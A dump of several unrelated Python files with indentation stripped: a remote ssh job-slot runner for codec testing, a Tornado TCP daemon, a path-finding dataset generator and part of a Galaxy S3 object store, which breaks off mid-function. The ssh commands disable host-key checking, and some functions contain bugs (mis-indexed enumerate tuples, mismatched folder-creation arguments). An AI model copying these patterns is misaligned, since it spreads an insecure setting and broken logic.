self.work_root = machine.work_root + '/slot' + str(num)
self.p = None
self.busy = False
self.work = None
self.log = log
self.can_kill = None
def gather(self):
return self.p.communicate()
def start_work(self, work):
self.work = work
work.slot = self
self.p = SlotProcess(self.log)
work_thread = threading.Thread(target=self.execute)
work_thread.daemon = True
self.busy = True
work_thread.start()
def clear_work(self):
if self.work:
self.work.slot = None
self.work = None
def execute(self):
try:
self.work.execute()
except Exception as e:
rd_print(self.log, e)
self.work.failed = True
self.busy = False
def setup(self,codec,bindir):
time.sleep(1)
try:
self.check_shell('mkdir -p '+shellquote(self.work_root))
time.sleep(1)
self.check_shell('rm -f '+shellquote(self.work_root)+'/*.y4m '+shellquote(self.work_root)+'/*.ivf')
time.sleep(1)
except subprocess.CalledProcessError as e:
rd_print(self.log,e.output)
rd_print(self.log,'Couldn\'t connect to machine '+self.machine.host)
raise RuntimeError('This is a bug with AWCY. Likely this machine has gone unreachable.')
if self.machine.rsync('./',self.work_root+'/rd_tool/') != 0:
rd_print(self.log,'Couldn\'t set up machine '+self.machine.host)
raise RuntimeError('Couldn\'t copy tools to machine (out of disk space?)')
time.sleep(1)
self.check_shell('rm -rf '+shellquote(self.work_root+'/'+codec))
for binary in binaries[codec]:
time.sleep(1)
self.check_shell('mkdir -p '+shellquote(self.work_root+'/'+codec+'/'+os.path.dirname(binary)));
time.sleep(1)
if self.machine.rsync(bindir+'/'+binary,self.work_root+'/'+codec+'/'+binary) != 0:
rd_print(self.log,'Couldn\'t upload codec binary '+binary+'to '+self.machine.host)
raise RuntimeError('Couldn\'t upload codec binary')
def start_shell(self, command):
self.p.shell(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no', self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
def kill(self):
kill_thread = threading.Thread(target=self.p.kill)
kill_thread.daemon = True
kill_thread.start()
def get_file(self, remote, local):
return subprocess.call(['scp','-i',ssh_privkey_file,'-P',self.machine.port,self.machine.user+'@'+self.machine.host+':'+shellquote(remote),local])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no',
self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
|
__init__.py
|
# -*- coding: utf-8 -*-
# vim: set expandtab shiftwidth=4:
__import__('gevent.monkey').monkey.patch_all()
import time
import logging
import threading
from tornado.ioloop import IOLoop
from tornado.tcpserver import TCPServer
from daemon.simpledaemon import SimpleDaemon
from utils.server.tornado import TornadoDaemonBackend
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s - - %(asctime)s %(message)s', datefmt='[%d/%b/%Y %H:%M:%S]')
## New connection activity:
class newConnection(object):
stream_set = set([])
def __init__(self, server, stream, address, commands=None):
logging.debug('Receive a new connection from %s', address)
self.server = server
self.stream = stream
self.address = address
self.commands = commands
self.stream_set.add(self.stream)
self.stream.set_close_callback(self._on_close)
self.stream.read_until('\n', self._on_read_line)
def _on_read_line(self, data):
logging.info('Command from %s: %s' % (self.address, data))
#for stream in self.stream_set:
# stream.write(data, self._on_write_complete)
if self.commands is not None:
self.commands.process(self, data)
## Write answer complete, wait for another command:
def _on_write_complete(self):
logging.info('Write answer to %s', self.address)
if not self.stream.reading():
self.stream.read_until('\n', self._on_read_line)
def _on_close(self):
logging.info('client quit %s', self.address)
self.stream_set.remove(self.stream)
def write(self, data, on_complete=None):
self.stream.write(data, on_complete)
def background(f):
"""
a threading decorator
use @background above the function you want to thread
(run in the background)
"""
def bg_f(*a, **kw):
threading.Thread(target=f, args=a, kwargs=kw).start()
return bg_f
class TornadoTCPDaemonServer(TCPServer):
port = 5555 ## Default port
host = None
commands = None
def __init__(self, io_loop=None, ssl_options=None, **kwargs):
io_loop = io_loop or IOLoop.instance()
self.is_exit = False
super(TornadoTCPDaemonServer, self).__init__(io_loop=io_loop, ssl_options=ssl_options, **kwargs)
def handle_stream(self, stream, address):
newConnection(self, stream, address, self.commands)
def run_every_time(self):
while True:
if self.is_exit:
break
time.sleep(1)
def stop(self):
self.is_exit = True
class TornadoTCPDaemonBackend(TornadoDaemonBackend):
def __init__(self, server):
self.server_class = server
@background
def run_every_time(self):
self.server.run_every_time()
def run(self):
self.server = self.server_class()
largs = {}
if self.server_class.host is not None:
largs['address'] = self.server_class.host
self.server.listen(self.server_class.port, **largs)
logging.info("Listen TCP: %s:%s" % (self.server_class.host, self.server_class.port))
self.run_every_time()
def stop(self):
self.server.stop()
|
CasesSolver_mapRanking.py
|
import os
import cv2
import sys
import time
import yaml
import random
import signal
import argparse
import itertools
import subprocess
import numpy as np
import matplotlib.cm as cm
import drawSvg as draw
import scipy.io as sio
from PIL import Image
from multiprocessing import Queue, Pool, Lock, Manager, Process
from os.path import dirname, realpath, pardir
os.system("taskset -p -c 0 %d" % (os.getpid()))
# os.system("taskset -p 0xFFFFFFFF %d" % (os.getpid()))
os.system("taskset -p -c 8-15,24-31 %d" % (os.getpid()))
parser = argparse.ArgumentParser("Input width and #Agent")
parser.add_argument('--map_width', type=int, default=10)
parser.add_argument('--map_density', type=float, default=0.1)
parser.add_argument('--map_complexity', type=float, default=0.01)
parser.add_argument('--num_agents', type=int, default=4)
parser.add_argument('--num_dataset', type=int, default=30000)
parser.add_argument('--random_map', action='store_true', default=False)
parser.add_argument('--gen_CasePool', action='store_true', default=False)
parser.add_argument('--chosen_solver', type=str, default='ECBS')
parser.add_argument('--num_caseSetup_pEnv', type=int, default=100)
parser.add_argument('--path_loadmap', type=str, default='../MultiAgentDataset/Solution_BMap/Storage_Map/BenchMarkMap')
parser.add_argument('--loadmap_TYPE', type=str, default='maze')
parser.add_argument('--path_save', type=str, default='../MultiAgentDataset/Solution_DMap')
args = parser.parse_args()
# set random seed
np.random.seed(1337)
def tf_index2xy(num_col, index):
Id_row = index // num_col
Id_col = np.remainder(index, num_col)
return [Id_row, Id_col]
# return Id_col, Id_row
def tf_xy2index(num_col, i, j):
return i * num_col + j
def handler(signum, frame):
raise Exception("Solution computed by Expert is timeout.")
class CasesGen:
def __init__(self, config):
self.config = config
self.random_map = config.random_map
self.min_len_path = 10
print(self.random_map)
self.path_loadmap = config.path_loadmap
self.num_agents = config.num_agents
self.num_data = config.num_dataset
self.path_save = config.path_save
if self.config.random_map:
self.map_density = config.map_density
self.label_density = str(config.map_density).split('.')[-1]
self.map_TYPE = 'map'
self.size_load_map = (config.map_width, config.map_width)
self.map_complexity = config.map_complexity
self.createFolder()
else:
# self.list_path_loadmap = self.search_Cases(os.path.join(self.path_loadmap, self.config.loadmap_TYPE), '.map')
self.list_path_loadmap = self.search_Cases(os.path.join(self.path_loadmap, self.config.loadmap_TYPE),
'.yaml')
if self.config.loadmap_TYPE=='free':
self.map_TYPE = 'map'
self.map_density = 0
self.label_density = '0'
self.size_load_map = (config.map_width, config.map_width)
self.map_complexity = int(0)
self.createFolder_()
self.pair_CasesPool = []
self.PROCESS_NUMBER = 4
self.timeout = 300
self.task_queue = Queue()
def createFolder_(self):
self.dirName_root = os.path.join(self.path_save,'{}{:02d}x{:02d}_density_p{}/IDMap{}/{}_Agent/'.format(self.map_TYPE, self.size_load_map[0],
self.size_load_map[1],
self.label_density,
self.num_agents))
self.dirName_input = os.path.join(self.dirName_root, 'input/')
self.dirName_mapSet = os.path.join(self.dirName_root, 'mapSet/')
try:
# Create target Directory
os.makedirs(self.dirName_root)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
try:
# Create target Directory
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_mapSet)
print("Directory ", self.dirName_input, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
def createFolder(self, id_env):
self.dirName_root = os.path.join(self.path_save,
'{}{:02d}x{:02d}_density_p{}/IDMap{:05d}/{}_Agent/'.format(self.map_TYPE,
self.size_load_map[0],
self.size_load_map[1],
self.label_density,id_env,
self.num_agents))
self.dirName_input = os.path.join(self.dirName_root, 'input/')
self.dirName_mapSet = os.path.join(self.dirName_root, 'mapSet/')
try:
# Create target Directory
os.makedirs(self.dirName_root)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
try:
# Create target Directory
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_mapSet)
print("Directory ", self.dirName_input, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
def resetFolder(self):
# self.list_path_loadmap
self.dirName_root = os.path.join(self.path_save,
'{}{:02d}x{:02d}_density_p{}/{}_Agent/'.format(self.map_TYPE,
self.size_load_map[0],
self.size_load_map[1],
self.label_density,
self.num_agents))
self.dirName_input = os.path.join(self.dirName_root, 'input/')
self.dirName_mapSet = os.path.join(self.dirName_root, 'mapSet/')
def search_Cases(self, dir, DATA_EXTENSIONS='.yaml'):
# make a list of file name of input yaml
list_path = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if self.is_target_file(fname,DATA_EXTENSIONS):
path = os.path.join(root, fname)
list_path.append(path)
return list_path
def is_target_file(self, filename, DATA_EXTENSIONS='.yaml'):
# DATA_EXTENSIONS = ['.yaml']
return any(filename.endswith(extension) for extension in DATA_EXTENSIONS)
def mapGen(self, width=10, height=10, complexity=0.01, density=0.1):
# Only odd shapes
# world_size = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)
# world_size = ((height // 2) * 2 , (width // 2) * 2 )
world_size = (height, width)
# Adjust complexity and density relative to maze size
# number of components
complexity = int(complexity * (5 * (world_size[0] + world_size[1])))
# size of components
density = int(density * ((world_size[0] // 2) * (world_size[1] // 2)))
# density = int(density * world_size[0] * world_size[1])
# Build actual maze
maze = np.zeros(world_size, dtype=np.int64)
# Make aisles
for i in range(density):
# x, y = np.random.randint(0, world_size[1]), np.random.randint(0, world_size[0])
# pick a random position
x, y = np.random.randint(0, world_size[1] // 2) * 2, np.random.randint(0, world_size[0] // 2) * 2
maze[y, x] = 1
for j in range(complexity):
neighbours = []
if x > 1: neighbours.append((y, x - 2))
if x < world_size[1] - 2: neighbours.append((y, x + 2))
if y > 1: neighbours.append((y - 2, x))
if y < world_size[0] - 2: neighbours.append((y + 2, x))
if len(neighbours):
y_, x_ = neighbours[np.random.randint(0, len(neighbours) - 1)]
if maze[y_, x_] == 0:
maze[y_, x_] = 1
maze[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1
x, y = x_, y_
# print(np.count_nonzero(maze))
return maze
def img_fill(self, im_in, n): # n = binary image threshold
th, im_th = cv2.threshold(im_in, n, 1, cv2.THRESH_BINARY)
# Copy the thresholded image.
im_floodfill = im_th.copy()
# Mask used to flood filling.
# Notice the size needs to be 2 pixels than the image.
h, w = im_th.shape[:2]
mask = np.zeros((h + 2, w + 2), np.uint8)
# Floodfill from point (0, 0)
cv2.floodFill(im_floodfill, mask, (int(w/2), int(h/2)), 255)
# Invert floodfilled image
im_floodfill_inv = cv2.bitwise_not(im_floodfill)
# print(im_floodfill_inv)
# Combine the two images to get the foreground.
fill_image = im_th | im_floodfill_inv
return fill_image
def mapload(self, id_env):
load_env = self.path_loadmap + 'map_{:02d}x{:02d}_density_p{}_id_{:02d}.npy'.format(self.size_load_map[0], self.size_load_map[1],
self.map_density, id_env)
map_env = np.load(load_env)
return map_env
def load_benchmarkMap(self, id_env):
filename = self.list_path_loadmap[id_env]
f = open(filename, 'r')
map_type = f.readline()
height = int(f.readline().split('height')[-1])
width = int(f.readline().split('width')[-1])
f.readline()
map_array = np.zeros([width, height])
for h in range(height):
char_row = f.readline()
for w in range(width):
if char_row[w] == '@':
map_array[h, w] = 1
return map_array
def load_benchmarkMap_yaml(self, id_env):
filename = self.list_path_loadmap[id_env]
with open(filename, 'r') as stream:
try:
# print(yaml.safe_load(stream))
data_config = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
list_posObstacle = data_config['map']['obstacles']
if list_posObstacle == None:
print('hhh')
map_array = np.zeros(self.size_load_map, dtype=np.int64)
else:
map_array = self.setup_map_array(list_posObstacle)
return map_array
def setup_map_array(self, list_posObstacle):
num_obstacle = len(list_posObstacle)
map_data = np.zeros(self.size_load_map)
for ID_obs in range(num_obstacle):
obstacleIndexX = list_posObstacle[ID_obs][0]
obstacleIndexY = list_posObstacle[ID_obs][1]
map_data[obstacleIndexX][obstacleIndexY] = 1
return map_data
def setup_map(self, id_random_env, num_cases_PEnv):
if self.random_map:
# randomly generate map with specific setup
map_env_raw = self.mapGen(width=self.size_load_map[0], height=self.size_load_map[1],
complexity=self.map_complexity, density=self.map_density)
else:
# map_env_raw = self.mapload(id_random_env)
# map_env_raw = self.load_benchmarkMap(id_random_env)
map_env_raw = self.load_benchmarkMap_yaml(id_random_env)
map_env = self.img_fill(map_env_raw.astype(np.uint8), 0.5)
array_freespace = np.argwhere(map_env == 0)
num_freespace = array_freespace.shape[0]
array_obstacle = np.transpose(np.nonzero(map_env))
num_obstacle = array_obstacle.shape[0]
if num_freespace == 0:
# if num_freespace == 0 or num_obstacle == 0:
# print(array_freespace)
map_env = self.setup_map(id_random_env, num_cases_PEnv)
return map_env
def setup_cases(self, id_random_env, num_cases_PEnv):
# Randomly generate certain number of unique cases in same map
(id_env, id_Env_label) = id_random_env
# print(map_env)
if self.config.loadmap_TYPE == 'free':
map_env = np.zeros(self.size_load_map, dtype=np.int64)
else:
map_env = self.setup_map(id_env, num_cases_PEnv)
self.size_load_map = np.shape(map_env)
array_freespace = np.argwhere(map_env == 0)
num_freespace = array_freespace.shape[0]
array_obstacle = np.transpose(np.nonzero(map_env))
num_obstacle = array_obstacle.shape[0]
print(
"###### Check Map Size: [{},{}]- density: {} - Actual [{},{}] - #Obstacle: {}".format(self.size_load_map[0],
self.size_load_map[1],
self.map_density,
self.size_load_map[0],
self.size_load_map[1],
num_obstacle))
# time.sleep(3)
list_freespace = []
list_obstacle = []
# transfer into list (tuple)
for id_FS in range(num_freespace):
list_freespace.append((array_freespace[id_FS, 0], array_freespace[id_FS, 1]))
for id_Obs in range(num_obstacle):
list_obstacle.append((array_obstacle[id_Obs, 0], array_obstacle[id_Obs, 1]))
# print(list_freespace)
pair_CaseSet_PEnv = []
pairStore = []
pair_agent = list(itertools.combinations(range(self.num_agents), 2))
num_cases_PEnv_exceed = int(5 * num_cases_PEnv)
for _ in range(num_cases_PEnv_exceed):
pairset = []
for id_agents in range(self.num_agents):
# ID_cases_agent = random.sample(list_freespace, 2)
temp_pair = random.sample(list_freespace, 2)
ID_cases_agent = self.check_heuristic(temp_pair, list_freespace)
# dist_pair = self.cal_heuristic(ID_cases_agent[0], ID_cases_agent[1])
# print(dist_pair)
pairset.append(ID_cases_agent)
pair_CaseSet_PEnv.append(pairset)
for pair_CaseSet in pair_CaseSet_PEnv:
check_condition = []
for id_pairagent in range(len(pair_agent)):
firstAgent = pair_agent[id_pairagent][0]
secondAgent = pair_agent[id_pairagent][1]
# print("pair", pairset)
if pair_CaseSet[firstAgent][0] == pair_CaseSet[secondAgent][0] or pair_CaseSet[firstAgent][1] == \
pair_CaseSet[secondAgent][1]:
print("Remove pair \t", pair_CaseSet)
check_condition.append(0)
else:
check_condition.append(1)
# pairStore.append(pairset)
if sum(check_condition) == len(pair_agent):
pairStore.append(pair_CaseSet)
# print("Remove cases ID-{}:\t {}".format(id_random_env, pair_CaseSet))
# todo: generate n-agent pair start-end position - start from single agent CBS
# todo: non-swap + swap
for initialCong in pairStore:
count_repeat = pairStore.count(initialCong)
if count_repeat > 1:
id_repeat = pairStore.index(initialCong)
pairStore.remove(initialCong)
print('Repeat cases ID {} from ID#{} Map:{}\n'.format(id_repeat, id_Env_label, pairStore[id_repeat]))
CasePool = pairStore[:num_cases_PEnv]
### Version 2 ##
### stack cases with same envs into a pool
random.shuffle(CasePool)
random.shuffle(CasePool)
self.save_CasePool(CasePool, id_Env_label, list_obstacle)
self.saveMap(id_Env_label,list_obstacle)
def check_heuristic(self, pair, list_freespace):
dist_pair = self.cal_heuristic(pair[0],pair[1])
# print(dist_pair)
if dist_pair>=self.min_len_path:
return pair
else:
pair = random.sample(list_freespace, 2)
return self.check_heuristic(pair, list_freespace)
def cal_heuristic(self, current_pos, goal):
value = abs(goal[0] - current_pos[0]) + abs(goal[1] - current_pos[1])
return value
def saveMap(self,Id_env,list_obstacle):
num_obstacle = len(list_obstacle)
map_data = np.zeros([self.size_load_map[0], self.size_load_map[1]])
aspect = self.size_load_map[0] / self.size_load_map[1]
xmin = -0.5
ymin = -0.5
xmax = self.size_load_map[0] - 0.5
ymax = self.size_load_map[1] - 0.5
d = draw.Drawing(self.size_load_map[0], self.size_load_map[1], origin=(xmin,ymin))
# d.append(draw.Rectangle(xmin, ymin, self.size_load_map[0], self.size_load_map[1], stroke='black',fill = 'white'))
# d.append(draw.Rectangle(xmin, ymin, xmax, ymax, stroke_width=0.1, stroke='black', fill='white'))
d.append(draw.Rectangle(xmin, ymin, self.size_load_map[0], self.size_load_map[1], stroke_width=0.1, stroke='black', fill='white'))
# d = draw.Drawing(self.size_load_map[0], self.size_load_map[1], origin=(0, 0))
# d.append(draw.Rectangle(0, 0, self.size_load_map[0], self.size_load_map[1], stroke_width=0, stroke='black', fill='white'))
for ID_obs in range(num_obstacle):
obstacleIndexX = list_obstacle[ID_obs][0]
obstacleIndexY = list_obstacle[ID_obs][1]
map_data[obstacleIndexX][obstacleIndexY] = 1
d.append(draw.Rectangle(obstacleIndexY-0.5, obstacleIndexX-0.5, 1, 1, stroke='black', stroke_width=0, fill='black'))
# d.append(draw.Rectangle(obstacleIndexX, obstacleIndexY, 0.5, 0.5, stroke='black', fill='black'))
# d.append(draw.Rectangle(obstacleIndexX - 0.5, obstacleIndexY - 0.5, 1, 1, stroke='black', stroke_width=1,
# fill='black'))
# setup figure
name_map = os.path.join(self.dirName_mapSet, 'IDMap{:05d}.png'.format(Id_env))
# d.setPixelScale(2) # Set number of pixels per geometry unit
d.setRenderSize(200, 200) # Alternative to setPixelScale
d.savePng(name_map)
# print(map_data)
# pass
# img = Image.fromarray(map_data)
# if img.mode != '1':
# img = img.convert('1')
# img.save(name_map)
def setup_CasePool(self):
num_data_exceed = int(self.num_data)
num_cases_PEnv = self.config.num_caseSetup_pEnv
num_Env = int(round(num_data_exceed / num_cases_PEnv))
# print(num_Env)
for id_random_env in range(num_Env):
# print(id_random_env)
self.setup_cases(id_random_env, num_cases_PEnv)
def get_numEnv(self):
return len(self.list_path_loadmap)
def setup_CasePool_(self, id_env):
filename = self.list_path_loadmap[id_env]
print(filename)
map_width = int(filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[0])
self.map_TYPE = self.config.loadmap_TYPE
self.size_load_map = (map_width, map_width)
self.label_density = int(
filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[-1].split('.map')[0])
self.map_density = int(self.label_density)
self.createFolder()
num_cases_PEnv = self.config.num_caseSetup_pEnv #int(round(num_data_exceed / num_Env))
# print(num_Env)
self.setup_cases(id_env, num_cases_PEnv)
def setup_CasePool_yaml(self, id_env):
filename = self.list_path_loadmap[id_env]
print(filename)
map_width = int(filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[0])
self.map_TYPE = self.config.loadmap_TYPE
self.size_load_map = (map_width, map_width)
self.label_density = int(
filename.split('{}-'.format(self.config.loadmap_TYPE))[-1].split('-')[-1].split('_ID')[0])
id_Env_label = int(filename.split("_ID")[-1].split(".yaml")[0])
self.map_density = int(self.label_density)
self.createFolder_(id_Env_label)
num_cases_PEnv = self.config.num_caseSetup_pEnv #int(round(num_data_exceed / num_Env))
# print(num_Env)
Index_env = (id_env, id_Env_label)
# print(Index_env)
# time.sleep(10)
self.setup_cases(Index_env, num_cases_PEnv)
def save_CasePool(self, pairPool, ID_env, env):
for id_case in range(len(pairPool)):
inputfile_name = self.dirName_input + \
'input_map{:02d}x{:02d}_IDMap{:05d}_IDCase{:05d}.yaml'.format(self.size_load_map[0], self.size_load_map[1],ID_env,
id_case)
self.dump_yaml(self.num_agents, self.size_load_map[0], self.size_load_map[1],
pairPool[id_case], env, inputfile_name)
def dump_yaml(self, num_agent, map_width, map_height, agents, obstacle_list, filename):
f = open(filename, 'w')
f.write("map:\n")
f.write(" dimensions: {}\n".format([map_width, map_height]))
f.write(" obstacles:\n")
for id_Obs in range(len(obstacle_list)):
f.write(" - [{}, {}]\n".format(obstacle_list[id_Obs][0], obstacle_list[id_Obs][1]))
f.write("agents:\n")
for n in range(num_agent):
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n][0], agents[n][1]))
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n]['start'], agents[n]['goal']))
f.write(" - name: agent{}\n start: [{}, {}]\n goal: [{}, {}]\n".format(n, agents[n][0][0],
agents[n][0][1],
agents[n][1][0],
agents[n][1][1]))
f.close()
def computeSolution(self, chosen_solver):
self.list_Cases_input = self.search_Cases(self.dirName_input)
self.list_Cases_input = sorted(self.list_Cases_input)
self.len_pair = len(self.list_Cases_input)
self.dirName_output = os.path.join(self.dirName_root,'output_{}/'.format(chosen_solver))
try:
# Create target Directory
os.makedirs(self.dirName_output)
print("Directory ", self.dirName_output, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
for id_case in range(self.len_pair):
self.task_queue.put(id_case)
time.sleep(0.3)
processes = []
for i in range(self.PROCESS_NUMBER):
# Run Multiprocesses
p = Process(target=self.compute_thread, args=(str(i), chosen_solver))
processes.append(p)
[x.start() for x in processes]
def compute_thread(self, thread_id, chosen_solver):
while True:
try:
# print(thread_id)
id_case = self.task_queue.get(block=False)
print('thread {} get task:{}'.format(thread_id, id_case))
self.runExpertSolver(id_case, chosen_solver)
# print('thread {} finish task:{}'.format(thread_id, id_case))
except:
# print('thread {} no task, exit'.format(thread_id))
return
def runExpertSolver(self, id_case, chosen_solver):
signal.signal(signal.SIGALRM, handler)
signal.alarm(self.timeout)
try:
# load
name_inputfile = self.list_Cases_input[id_case]
id_input_map = name_inputfile.split('_IDMap')[-1].split('_IDCase')[0]
id_input_case = name_inputfile.split('_IDCase')[-1].split('.yaml')[0]
name_outputfile = self.dirName_output + 'output_map{:02d}x{:02d}_IDMap{}_IDCase{}_{}.yaml'.format(self.size_load_map[0],
self.size_load_map[1],id_input_map,
id_input_case, chosen_solver)
command_dir = dirname(realpath(__file__))
# print(command_dir)
# command_dir = '/local/scratch/ql295/Data/Project/GraphNeural_Planner/onlineExpert'
# print(name_inputfile)
# print(name_outputfile)
if chosen_solver.upper() == "ECBS":
command_file = os.path.join(command_dir, "ecbs")
# run ECBS
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile,
"-w", str(1.1)],
cwd=command_dir)
elif chosen_solver.upper() == "CBS":
command_file = os.path.join(command_dir, "cbs")
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile],
cwd=command_dir)
elif chosen_solver.upper() == "SIPP":
command_file = os.path.join(command_dir, "mapf_prioritized_sipp")
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile],
cwd=command_dir)
log_str = 'map{:02d}x{:02d}_{}Agents_#{}_in_IDMap_#{}'.format(self.size_load_map[0], self.size_load_map[1],
self.num_agents, id_input_case, id_input_map)
print('############## Find solution by {} for {} generated ###############'.format(chosen_solver,log_str))
with open(name_outputfile) as output_file:
return yaml.safe_load(output_file)
except Exception as e:
print(e)
if __name__ == '__main__':
path_savedata = '../Solution_DMap'
# num_dataset = 10 #16**2
# size_map = (5, 5)
dataset = CasesGen(args)
timeout = 300
if args.random_map:
path_loadmap = ''
if args.gen_CasePool:
dataset.setup_CasePool()
time.sleep(10)
dataset.computeSolution(args.chosen_solver)
else:
path_loadmap = args.path_loadmap
num_Env = dataset.get_numEnv()
# print(num_Env)
for id_Env in range(num_Env):
print('\n################## {} ####################\n'.format(id_Env))
# dataset.setup_CasePool_(id_Env)
dataset.setup_CasePool_yaml(id_Env)
time.sleep(10)
dataset.computeSolution(args.chosen_solver)
|
s3.py
|
"""
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectNotFound
from galaxy.util import string_as_bool, umask_fix_perms
from galaxy.util.directory_hash import directory_hash_id
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import ObjectStore, convert_bytes
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
except ImportError:
boto = None
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available."
"Please install and properly configure boto or modify object store configuration.")
log = logging.getLogger( __name__ )
logging.getLogger('boto').setLevel(logging.INFO) # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
def __init__(self, config, config_xml):
if boto is None:
raise Exception(NO_BOTO_ERROR_MESSAGE)
super(S3ObjectStore, self).__init__(config, config_xml)
self.config = config
self.staging_path = self.config.file_path
self.transfer_progress = 0
self._parse_config_xml(config_xml)
self._configure_connection()
self.bucket = self._get_bucket(self.bucket)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
def _configure_connection(self):
log.debug("Configuring S3 Connection")
self.conn = S3Connection(self.access_key, self.secret_key)
def _parse_config_xml(self, config_xml):
try:
a_xml = config_xml.findall('auth')[0]
self.access_key = a_xml.get('access_key')
self.secret_key = a_xml.get('secret_key')
b_xml = config_xml.findall('bucket')[0]
self.bucket = b_xml.get('name')
self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
cn_xml = config_xml.findall('connection')
if not cn_xml:
cn_xml = {}
else:
cn_xml = cn_xml[0]
self.host = cn_xml.get('host', None)
self.port = int(cn_xml.get('port', 6000))
self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
self.conn_path = cn_xml.get('conn_path', '/')
c_xml = config_xml.findall('cache')[0]
self.cache_size = float(c_xml.get('size', -1))
# for multipart upload
self.s3server = {'access_key': self.access_key,
'secret_key': self.secret_key,
'is_secure': self.is_secure,
'max_chunk_size': self.max_chunk_size,
'host': self.host,
'port': self.port,
'use_rr': self.use_rr,
'conn_path': self.conn_path}
except Exception:
# Toss it back up after logging, we can't continue loading at this point.
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
""" Sometimes a handle to a bucket is not established right away so try
it a few times. Raise error is connection is not established. """
for i in range(5):
try:
bucket = self.conn.get_bucket(bucket_name)
log.debug("Using cloud object store with bucket '%s'", bucket.name)
return bucket
except S3ResponseError:
try:
log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
self.conn.create_bucket(bucket_name)
except S3ResponseError:
